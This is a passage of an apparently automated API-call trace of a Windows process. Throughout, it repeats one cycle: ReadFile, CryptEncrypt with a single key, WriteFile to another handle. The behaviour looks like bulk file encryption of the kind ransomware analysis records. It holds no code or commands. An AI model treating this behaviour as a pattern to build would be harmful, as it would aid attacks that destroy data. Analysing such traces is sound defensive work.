lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.492] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.492] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.492] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.492] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.492] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.492] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.492] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.492] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.492] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.493] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.493] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.493] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.493] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.493] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.493] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.493] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.493] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.493] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.493] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.493] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.493] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.493] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.493] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.493] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.494] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.494] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.494] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.494] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.494] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.494] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.494] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.494] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.494] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.494] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.494] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.494] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.494] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.494] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.494] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.495] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.495] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.495] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.495] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.495] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.495] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.495] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.495] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.495] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.495] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.495] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.495] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.495] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.495] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.495] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.496] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.496] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.496] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.496] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.496] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.496] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.496] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.496] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.496] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.496] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.496] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.496] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.497] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.497] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.497] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.497] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.497] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.497] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.497] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.497] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.497] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.497] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.497] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.497] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.497] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.497] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.497] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.497] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.497] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.498] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.498] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.498] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.498] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.498] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.498] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.498] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.498] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.498] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.498] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.498] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.498] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.498] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.498] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.498] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.499] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.499] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.499] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.499] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.499] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.499] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, 